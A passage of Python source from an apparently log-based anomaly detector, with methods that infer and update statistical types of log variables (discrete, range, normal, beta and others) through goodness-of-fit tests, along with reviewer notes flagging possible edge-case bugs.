tmp_string += f'Event {self.event_type_detector.get_event_type(event_index)}: ' tmp_string += f'Indicator of a change in system behaviour: {np.arctan(2 * indicator) / np.pi * 2}. 
Paths to' \ f' the corresponding variables: {affected_paths}' self.print(tmp_string, log_atom, affected_paths, np.arctan(2 * indicator) / np.pi * 2, indicator=True) # Update the var_type_history_list_reference if self.learn_mode and (not isinstance(self.num_var_type_hist_ref, bool)) and ( not isinstance(self.num_update_var_type_hist_ref, bool)) and len( self.var_type_history_list_reference) >= event_index + 1 and \ self.var_type_history_list_reference[event_index] != [] and ((( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update - self.num_var_type_hist_ref) % self.num_update_var_type_hist_ref == 0): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): self.var_type_history_list_reference[event_index][var_index] = [] for type_index, type_val in enumerate(var_val): if len(type_val) >= 1 and isinstance(type_val[0], list): if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: # Continuous or range variable type # Calculate the mean of all entries not zero self.var_type_history_list_reference[event_index][var_index].append([sum( type_val[0][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[0][ -self.num_var_type_hist_ref:] if x != 0]), 1), sum(type_val[1][ -self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[1][ -self.num_var_type_hist_ref:] if x != 0]), 1)]) else: self.var_type_history_list_reference[event_index][var_index].append( [sum(x[-self.num_var_type_hist_ref:]) for x in type_val]) else: self.var_type_history_list_reference[event_index][var_index].append(sum( type_val[-self.num_var_type_hist_ref:])) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) def detect_var_type(self, event_index, var_index): """Give back the assumed variable type of the variable with the in
self.event_type_detector stored values.

Only the last num_init stored values of the variable are examined. The result is a list whose first entry is the type tag,
followed by the parameters of that type:
- ['stat', [value], False] if all values are identical.
- ['asc', 'int'|'float'] or ['desc', 'int'|'float'] if the values are numeric (convertible to floats) and non-decreasing
  resp. non-increasing.
- ['range', lower_limit, upper_limit, 0] (from calculate_value_range) if the Durbin-Watson statistic of the centred values
  lies outside the critical bounds taken from crit_val_dw.
- the result of detect_continuous_shape if a continuous distribution fits.
- ['unq', values] if all num_init values are distinct and the values are either non-numeric or integers.
- ['others', 0] if the number of distinct values reaches num_init * (1 - sim_thres); the 0 is the number of update runs
  without a new type.
- ['d', values_set, values_app, len(values)] otherwise, where values_app holds the relative frequency of each entry of
  values_set.
The range and continuous tests are only run if the values are numeric, more than div_thres * num_init distinct values
exist, and either test_gof_int is set or the values are not all integers.
NOTE(review): crit_val_dw[dw_alpha] is indexed with len(float_values) without a guard - presumably the table covers every
sample length that can occur here; verify against the constructor.
""" # Values which are being tested values = self.event_type_detector.values[event_index][var_index][-self.num_init:] # Unique values values_set = set(values) # Number of unique values num_diff_vals = len(values_set) if num_diff_vals == 1: return ['stat', list(values_set), False] # List of floats or False float_values = convert_to_floats(values) is_int = False if len(float_values) > 0: is_int = consists_of_ints(float_values) # Values are integer numbers if len(float_values) > 0: previous_val = float_values[0] asc = True desc = True # Test for ascending for v in float_values[1:]: if previous_val > v: asc = False break previous_val = v previous_val = float_values[0] # Test for descending for v in float_values[1:]: if previous_val < v: desc = False break previous_val = v if asc: if is_int: return ['asc', 'int'] return ['asc', 'float'] if desc: if is_int: return ['desc', 'int'] return ['desc', 'float'] # Checking if no integers should be tested and if the values are integers if not self.test_gof_int and is_int: float_values = [] if len(float_values) > 0 and (num_diff_vals > self.div_thres * self.num_init): float_values_mean = np.mean(float_values) dw_result = durbin_watson([val - float_values_mean for val in float_values]) if dw_result < self.crit_val_dw[self.dw_alpha][len(float_values)] or\ dw_result > 4 - self.crit_val_dw[self.dw_alpha][len(float_values)]: var_type = self.calculate_value_range(float_values) else: # test for a continuous distribution. If none fits, the function will return ['d'] var_type = self.detect_continuous_shape(float_values) else: # discrete var type var_type = ['d'] # Test for discrete, unique and others if var_type == ['d']: if self.num_init == num_diff_vals and (len(float_values) == 0 or is_int): # unique var type return ['unq', values] if num_diff_vals >= self.num_init * (1 - self.sim_thres): # Values do not follow a specific pattern, the second entry is the number of update runs without a new type. 
return ['others', 0] # Initialize the discrete type values_set = list(values_set) values_app = [0 for _ in range(num_diff_vals)] for value in values: values_app[values_set.index(value)] += 1 values_app = [x / len(values) for x in values_app] # discrete var type return ['d', values_set, values_app, len(values)] return var_type def detect_continuous_shape(self, values): """Detect if the sample follows one of the checked continuous distribution and returns the found type in a fitting format. ['d'] if none fit.

@param values the list of numbers to test; it is converted to a numpy array and must contain at least two distinct values,
because the sample is standardised with max_val - min_val and with the fitted sigma.
The candidates are the uniform, normal, beta(0.5, 0.5), beta(5, 2), beta(2, 5), beta(1, 5) and beta(5, 1) distributions;
with used_gof_test == 'KS' also a mixed beta distribution ('betam', only if the mean lies within the inner two thirds of
the range) and the empiric distribution stored in self.quantiles['spec'], tested in both orientations.
With used_gof_test == 'KS' the significance of a candidate is its KS p-value, or, if crit_val_ini_ks holds a critical value
for (gof_alpha, num_init), gof_alpha times that critical value divided by the KS statistic. The candidate with the highest
significance is returned if that significance is >= gof_alpha, with the other candidates that also reached gof_alpha
appended as a list of alternatives, e.g. ['nor', ev, sigma, min_val, max_val, [alternatives]] or
['beta', ev, sigma, min_val, max_val, n, [alternatives]].
With used_gof_test == 'CM' the Cramer-von-Mises statistic of the shifted sample is divided by the critical value in
crit_val_ini_cm[gof_alpha][num_init] (no guard for a missing entry); the candidate with the smallest ratio is returned if
that ratio is <= 1.
If no candidate fits, ['d'] is returned, or ['emp', ev, sigma, []] if use_empiric_distr is set (presumably for both
tests - verify).
NOTE(review): for 'betam' and 'spec' the scaled KS significance is statistic / crit_val * est_penalty, which grows with the
KS statistic, while the other scaled entries use gof_alpha * critical value / statistic - confirm that this direction is
intended. NOTE(review): the CM branch collects alternatives with ratio >= gof_alpha although a smaller ratio means a
better fit - confirm.
""" # List of the p-values of the distributions significance = [] # List of the tested distributions distribution = [] # Converts the floats/integer to an array for faster manipulations and tests values = np.array(values) if self.used_gof_test == 'KS': # Test for uniform distribution min_val = min(values) max_val = max(values) if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'uni'] / kstest(values, 'uniform', args=(min_val, max_val - min_val))[0]) distribution.append(['uni', min_val, max_val]) else: significance.append(kstest(values, 'uniform', args=(min_val, max_val - min_val))[1]) distribution.append(['uni', min_val, max_val]) # Test for normal distribution # Getting the expected value and sigma [ev, sigma] = norm.fit(values) # KS-test of the standardised values and the distribution if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'nor'] / kstest((values - ev) / sigma, 'norm')[0]) distribution.append(['nor', ev, sigma, min_val, max_val]) else: significance.append(kstest((values - ev) / sigma, 'norm')[1]) distribution.append(['nor', ev, sigma, min_val, max_val]) # Test for beta distribution # (0.5*0.5/((0.5+0.5+1)(0.5+0.5)^2))^(1/2) = 2.82842712 ev_tmp = (min_val + max_val) / 2  # expected value of beta(0.5, 0.5) rescaled to [min_val, max_val]
sigma_tmp = (max_val - min_val) / 2.82842712 if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta1'] / kstest((values-min_val)/(max_val-min_val), 'beta', args=(0.5, 0.5))[0]) distribution.append(['beta', ev_tmp, sigma_tmp, min_val, max_val, 1]) else: significance.append(kstest((values-min_val)/(max_val-min_val), 'beta', args=(0.5, 0.5))[1]) distribution.append(['beta', ev_tmp, sigma_tmp, min_val, max_val, 1]) # KS-test of the standardised values and the distribution if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: # Beta 2 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta2'] / kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+5/(5+2), 'beta', args=(5, 2))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 2]) # Beta 3 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta2'] / kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+2/(5+2), 'beta', args=(2, 5))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 3]) # Beta 4 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta4'] / kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+1/(1+5), 'beta', args=(1, 5))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Beta 5 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta4'] / kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+5/(1+5), 'beta', args=(5, 1))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) else: # Beta 2 significance.append(kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+5/(5+2), 'beta', args=(5, 2))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 2]) # Beta 3 (mirror image of Beta 2, therefore the 'beta2' critical value is reused above)
significance.append(kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+2/(5+2), 'beta', args=(2, 5))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 3]) # Beta 4 significance.append(kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+1/(1+5), 'beta', args=(1, 5))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Beta 5 significance.append(kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+5/(1+5), 'beta', args=(5, 1))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) # Crit value for the self generated or mixed distributions crit_val = pow(-np.log(self.gof_alpha) * 3 / self.num_init / 4, 1 / 2) est_penalty = 1.4 # Estimated penalty for the adapted ev and SD # Test for the mixed beta distribution # ev/sigma of Beta 4: ev=1/(1+5) sigma=pow(1*5/(1+5+1),1/5)/(1+5) # sigma in [sigmaBetam1,sigmaBetam2] if 1 / 6 < (ev - min_val) / (max_val - min_val) < 5 / 6: # Interpolate the expected distribution functions threw the sigma in the interval proportion = ((ev - min_val) / (max_val - min_val) - 5 / 6) / (-4 / 6) tmp_index = [int(round(i / proportion)) for i in range(int(round(1000 * proportion)))] if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(ks_2samp([self.quantiles['betam1'][i] for i in tmp_index] + [self.quantiles['betam2'][ i] for i in range(1000) if i not in tmp_index], (values - min_val) / (max_val - min_val))[0] / crit_val * est_penalty) distribution.append(['betam', min_val, max_val - min_val, min_val, max_val, proportion]) else: significance.append(ks_2samp([self.quantiles['betam1'][i] for i in tmp_index] + [self.quantiles['betam2'][ i] for i in range(1000) if i not in tmp_index], (values - min_val) / (max_val - min_val))[1]) distribution.append(['betam', min_val, max_val - min_val, min_val, max_val, proportion]) # Test for alternative distribution # KS-test of the standardised values and the distribution if self.gof_alpha in 
self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(ks_2samp(self.quantiles['spec'], (values - ev) / sigma)[0] / crit_val * est_penalty) distribution.append(['spec', ev, sigma, min_val, max_val, 0]) significance.append( ks_2samp(self.quantiles['spec'], -(values - ev) / sigma)[0] / crit_val * est_penalty) distribution.append(['spec', ev, sigma, min_val, max_val, 1]) else: significance.append(ks_2samp(self.quantiles['spec'], (values - ev) / sigma)[1]) distribution.append(['spec', ev, sigma, min_val, max_val, 0]) significance.append(ks_2samp(self.quantiles['spec'], -(values - ev) / sigma)[1]) distribution.append(['spec', ev, sigma, min_val, max_val, 1]) # Check if one of the above tested continuous distribution fits if max(significance) >= self.gof_alpha: sort_indices = np.argsort(significance) sort_list = [] for i in range(len(sort_indices) - 2, -1, -1): if significance[sort_indices[i]] >= self.gof_alpha: sort_list.append(distribution[sort_indices[i]]) return distribution[sort_indices[-1]] + [sort_list] if self.used_gof_test == 'CM': min_val = min(values) max_val = max(values) [ev, sigma] = norm.fit(values) # Test for uniform distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.min_mod_ini_uni-self.max_mod_ini_uni) + self.min_mod_ini_uni, 'uniform') / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['uni']) distribution.append(['uni', min_val - self.min_mod_ini_uni / (1-self.min_mod_ini_uni-self.max_mod_ini_uni) * (max_val-min_val), max_val + self.max_mod_ini_uni / (1-self.min_mod_ini_uni-self.max_mod_ini_uni) * (max_val-min_val)]) # Test for normal distribution significance.append(cramervonmises((values-ev) / sigma, 'norm') / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['nor']) distribution.append(['nor', ev, sigma, min_val, max_val]) # Test for beta1 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * 
(1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) + self.min_mod_ini_beta1, 'beta', args=(0.5, 0.5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta1']) distribution.append(['beta', ev, sigma, min_val - self.min_mod_ini_beta1 / (1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) * (max_val-min_val), max_val + self.max_mod_ini_beta1 / (1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) * (max_val-min_val), 1]) # Test for beta2 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) + self.min_mod_ini_beta2, 'beta', args=(5, 2)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta2']) distribution.append(['beta', ev, sigma, min_val - self.min_mod_ini_beta2 / (1-self.min_mod_ini_beta2-self.max_mod_ini_beta2) * (max_val-min_val), max_val + self.max_mod_ini_beta2 / (1-self.min_mod_ini_beta2-self.max_mod_ini_beta2) * (max_val-min_val), 2]) # Test for beta3 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) + self.max_mod_ini_beta2, 'beta', args=(2, 5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta2']) distribution.append(['beta', ev, sigma, min_val - self.max_mod_ini_beta2 / (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) * (max_val-min_val), max_val + self.min_mod_ini_beta2 / (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) * (max_val-min_val), 3]) # Test for beta4 distribution significance.append(cramervonmises((values-min_val) / (ev-min_val) * (1/6-self.min_mod_ini_beta4) + self.min_mod_ini_beta4, 'beta', args=(1, 5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta4']) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Test for beta5 distribution significance.append(cramervonmises((values-max_val) / (max_val-ev) * (1/6-self.min_mod_ini_beta4) + 1 - self.min_mod_ini_beta4, 'beta', args=(5, 1)) / 
self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta4']) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) # Check if one of the above tested continuous distribution fits if min(significance) <= 1: sort_indices = np.argsort(significance) sort_list = [] for i in sort_indices[1:]: if significance[i] >= self.gof_alpha: sort_list.append(distribution[i]) return distribution[sort_indices[0]] + [sort_list] if self.use_empiric_distr: return ['emp', ev, sigma, []] # discrete if no distribution fits return ['d'] def calculate_value_range(self, values): """Calculate the lower and upper limit of the expected values through the mean and standard deviation of the given values.

@param values list of numbers; for used_range_test 'EmpiricQuantiles' and 'MinMax' the list is sorted in place, so the
caller's list is modified.
'MeanSD' fits a normal distribution and places the limits at ev -/+ |sigma * norm.ppf(range_alpha / 2)| * range_limits_factor
(ev_dist is negative for range_alpha < 1, hence the swapped signs in the two assignments).
'EmpiricQuantiles' widens the minimum and the maximum by the distance to the value at position
int(len(values) * (0.5 - range_alpha / 2) + 0.5) from the respective end, scaled with range_limits_factor.
Every other value of used_range_test is treated as 'MinMax', which widens the minimum and the maximum by
(0.5 - range_alpha / 2) * range_limits_factor times the span of the values.
@return ['range', lower_limit, upper_limit, 0]; the trailing 0 is the counter of update steps that update_var_type
increments and resets.
""" if self.used_range_test == 'MeanSD': # Calculate the mean and standard deviation of the test sample [ev, sigma] = norm.fit(values) # Estimate distance of the mean ot the limits with the quantiles of the normal distribution. ev_dist = sigma * norm.ppf(self.range_alpha / 2) # Calculate lower and upper limit lower_limit = ev + ev_dist * self.range_limits_factor upper_limit = ev - ev_dist * self.range_limits_factor elif self.used_range_test == 'EmpiricQuantiles': # Sort values values.sort() # Calculate lower and upper limit lower_limit = values[0] - (values[int(len(values) * (0.5 - self.range_alpha / 2) + 0.5)] - values[0]) * self.range_limits_factor upper_limit = values[-1] - ( values[-1 - int(len(values) * (0.5 - self.range_alpha / 2) + 0.5)] - values[-1]) * self.range_limits_factor else: # self.used_range_test == 'MinMax' # Sort values values.sort() # Calculate lower and upper limit lower_limit = values[0] - (values[-1] - values[0]) * (0.5 - self.range_alpha / 2) * self.range_limits_factor upper_limit = values[-1] + (values[-1] - values[0]) * (0.5 - self.range_alpha / 2) * self.range_limits_factor return ['range', lower_limit, upper_limit, 0] def update_var_type(self, event_index, var_index, log_atom): """Test if the new num_update values fit the detected var type and updates the var 
type if the test fails.""" # Getting the new values and saving the old distribution for printing-purposes if the test fails new_values = self.event_type_detector.values[event_index][var_index][-self.num_update:] VT_old = copy.deepcopy(self.var_type[event_index][var_index]) # Test and update for continuous distribution if self.var_type[event_index][var_index][0] in self.distr_list: if not consists_of_floats(new_values): # A value is not a float or integer, so the new assigned type is others # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.distr_val[event_index][var_index] = [] self.bt_results[event_index][var_index] = [] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom, 1.0) return # first_distr is used to test the current distribution with the BT and to discard the alternative distributions if they # fail the s_gof-test once first_distr = True s_gof_result = self.s_gof_test(event_index, var_index, first_distr) # Calculate the confidence as the stretched sigmaoid function of the maximal value of the step fct # 1 / (1 + np.exp(-2)) = 1.1353352832366128 confidence = 1 / (1 + np.exp(-2 * s_gof_result[1])) * 1.1353352832366128 while not s_gof_result[0]: # If the test fails a new shape is searched for in the alternative distributions self.bt_results[event_index][var_index] = self.bt_results[event_index][var_index][1:] + [0] # Update the results of the BT first_distr = False # Check if the BT is applicable and if it holds if first_distr and (sum(self.bt_results[event_index][var_index]) >= self.s_gof_bt_min_success): return if not self.learn_mode: # Do not update variable type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return if len(self.alternative_distribution_types[event_index][var_index]) != 0: # There is 
at least one alternative distribution # Initializes the distributionvalues and bucketnumbers self.var_type[event_index][var_index] = self.alternative_distribution_types[event_index][var_index][0] self.alternative_distribution_types[event_index][var_index] = self.alternative_distribution_types[event_index][ var_index][1:] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) s_gof_result = self.s_gof_test(event_index, var_index, first_distr) # There is no alternative distribution. The var type is set to others else: # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.distr_val[event_index][var_index] = [] self.bt_results[event_index][var_index] = [] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom, confidence) return # Check if the s_gof_test was successful and remark the success if first_distr: self.bt_results[event_index][var_index] = self.bt_results[event_index][var_index][1:] + [1] # Print a message if the vartype has changed if VT_old != self.var_type[event_index][var_index]: self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom, confidence) # Test and update if the values are in the specified range elif self.var_type[event_index][var_index][0] == 'range': self.var_type[event_index][var_index][3] += 1 # Check if the sum of distances of all values outside the defined limits is greater than range_threshold times the range of # the limits if sum(max(0, val - self.var_type[event_index][var_index][2]) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) +\ sum(max(0, self.var_type[event_index][var_index][1] - val) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) >\ self.range_threshold * (self.var_type[event_index][var_index][2] - 
self.var_type[event_index][var_index][1]): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) # Reset counter if at least one value lies outside of the limits elif any(max(0, val - self.var_type[event_index][var_index][2]) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) or\ any(max(0, self.var_type[event_index][var_index][1] - val) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]): self.var_type[event_index][var_index][3] = 1 # Reinitialize the range limits if no value was outside of the range in the last num_reinit_range update steps elif self.learn_mode and self.num_reinit_range != 0 and\ self.var_type[event_index][var_index][3] % self.num_reinit_range == 0: self.var_type[event_index][var_index] = self.calculate_value_range( self.event_type_detector.values[event_index][var_index][-self.num_update:]) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Test and update for ascending values elif self.var_type[event_index][var_index][0] == 'asc': # Search for a not ascending sequence in the values for j in range(-self.num_update, 0): if self.event_type_detector.values[event_index][var_index][j - 1] >\ self.event_type_detector.values[event_index][var_index][j]: # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not 
follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return elif self.var_type[event_index][var_index][0] == 'desc': # Test and update for descending values for j in range(-self.num_update, 0): # Search for a not ascending sequence in the values if self.event_type_detector.values[event_index][var_index][j - 1] <\ self.event_type_detector.values[event_index][var_index][j]: if not self.learn_mode: # Do not update variable type self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return elif self.var_type[event_index][var_index][0] == 'd': # Test and update for values of the discrete type # Check if new values have appeared if len(set(new_values + self.var_type[event_index][var_index][1])) > len(self.var_type[event_index][var_index][1]): # New values have appeared # Test if vartype others if len(set(new_values + self.var_type[event_index][var_index][1])) >= ( self.num_update + self.var_type[event_index][var_index][3]) * (1 - self.sim_thres): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][2][1][-1] = 1 return # Create 
the new value-set and expands the occurrence-list for the new values new_values_set = list(set(self.event_type_detector.values[event_index][var_index][-self.num_update:])) for val in new_values_set: if val not in self.var_type[event_index][var_index][1]: self.var_type[event_index][var_index][1].append(val) self.var_type[event_index][var_index][2].append(0) # update the occurrences # List for the appearances of the new values values_app = [0] * len(self.var_type[event_index][var_index][1]) for i in range(-self.num_update, 0): values_app[self.var_type[event_index][var_index][1].index( self.event_type_detector.values[event_index][var_index][i])] += 1 tmp_number = self.var_type[event_index][var_index][3] / ( self.num_update + self.var_type[event_index][var_index][3]) # Updates the appearance-list in the var type of the discrete variable for j, val in enumerate(self.var_type[event_index][var_index][2]): self.var_type[event_index][var_index][2][j] = \ val * tmp_number + values_app[j] / (self.num_update + self.var_type[event_index][var_index][3]) self.var_type[event_index][var_index][3] = self.num_update + self.var_type[event_index][var_index][3] self.d_init_bt(event_index, var_index) self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][2][1][-1] = 1 return # No new values have appeared, so the normal test for discrete variables is used self.d_test(event_index, var_index) # Check if the values should be considered others or if the BT failed if (len(set(new_values + self.var_type[event_index][var_index][1])) >= ( self.num_update + self.var_type[event_index][var_index][3]) * (1 - self.sim_thres)) or (sum( self.bt_results[event_index][var_index][0]) < self.d_bt_min_success): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.bt_results[event_index][var_index][0] = 
[1] * self.num_d_bt self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Update the probabilities of the discrete values if self.learn_mode and self.bt_results[event_index][var_index][0][-1]: # List for the number of appearance of the values values_app = [0 for x in range(len(self.var_type[event_index][var_index][1]))] for val in new_values: values_app[self.var_type[event_index][var_index][1].index(val)] += 1 tmp_number = self.var_type[event_index][var_index][3] / ( self.num_update + self.var_type[event_index][var_index][3]) # Updates the appearance-list in the var type of the discrete variable for j, val in enumerate(self.var_type[event_index][var_index][2]): self.var_type[event_index][var_index][2][j] = \ val * tmp_number + values_app[j] / (self.num_update + self.var_type[event_index][var_index][3]) self.var_type[event_index][var_index][3] = self.num_update + self.var_type[event_index][var_index][3] # Check if the discrete distribution has to be updated if ((self.var_type[event_index][var_index][3] - self.num_init) % self.num_pause_discrete) == 0: self.d_init_bt(event_index, var_index) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) return # Test and update for static variables if self.var_type[event_index][var_index][0] == 'stat': # Check if still static if all(new_values[i] == self.event_type_detector.values[event_index][var_index][0] for i in range(self.num_update)): if self.var_type[event_index][var_index][2] and self.num_stat_stop_update is True and \ self.event_type_detector.num_event_lines[event_index] >= self.num_stat_stop_update: self.event_type_detector.check_variables[event_index][var_index] = False 
self.event_type_detector.values[event_index][var_index] = [] self.var_type[event_index][var_index] = [] self.var_type_history_list[event_index][var_index] = [] if len(self.var_type_history_list_reference) > event_index and len(self.var_type_history_list_reference[event_index]) >\ var_index: self.var_type_history_list_reference[event_index][var_index] = [] affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print(f'Stopped tracking the variable of event type {self.event_type_detector.get_event_type(event_index)} with' f' Path:\n{affected_path}\nbecause of its static values.', log_atom, affected_path, confidence=1 - 1 / self.num_stat_stop_update) return # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Check if new values appear to be of type others if len(set(new_values)) >= self.num_update * (1 - self.sim_thres) and self.num_update >= 3: # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Change the var type from static to discrete # list of the values values_set = list(set(self.event_type_detector.values[event_index][var_index][-self.num_init:])) # List to store the appearance of the values values_app = [0 for _ in range(len(values_set))] for j in range(-self.num_init, 0): values_app[values_set.index(self.event_type_detector.values[event_index][var_index][j])] += 1 values_app = [x / self.num_init for x in values_app] # Values follow a discrete pattern self.var_type[event_index][var_index] = ['d', values_set, values_app, self.num_init] self.d_init_bt(event_index, var_index) self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom) return # Test and update for unique values if 
self.var_type[event_index][var_index][0] == 'unq': # Check if the new values are not unique if len(set(self.event_type_detector.values[event_index][var_index][-self.num_update:])) != self.num_update: if not self.learn_mode: # Do not update variable type self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Check if one of the new values has appeared in the last self.num_update_unq values for j in self.event_type_detector.values[event_index][var_index][-self.num_update:]: if j in self.event_type_detector.values[event_index][var_index][ -self.num_update_unq - self.num_update:-self.num_update]: # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return return # Update for var type others if self.var_type[event_index][var_index][0] == 'others': # Do not update variable type if not self.learn_mode: return # Check if it has passed enough time, to check if the values have a new var_type if (self.var_type[event_index][var_index][1] + 1) % (self.num_pause_others + 1) == 0: # Added a exponential waiting time to avoid redundant tests if not consists_of_ints([np.log2((self.var_type[event_index][var_index][1] + 1) / (self.num_pause_others + 1))]): self.var_type[event_index][var_index][1] += 1 return # Checking for a new var_type vt_new = self.detect_var_type(event_index, var_index) # Only increase the number of skipped update-cycles if vt_new[0] == 'others': self.var_type[event_index][var_index][1] += 1 return # The 
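def s_gof_get_quantiles(self, event_index, var_index):
    """Generate the quantile list used as the reference sample of the sliding gof-test.

    The result is stored in self.distr_val[event_index][var_index]; nothing is returned.
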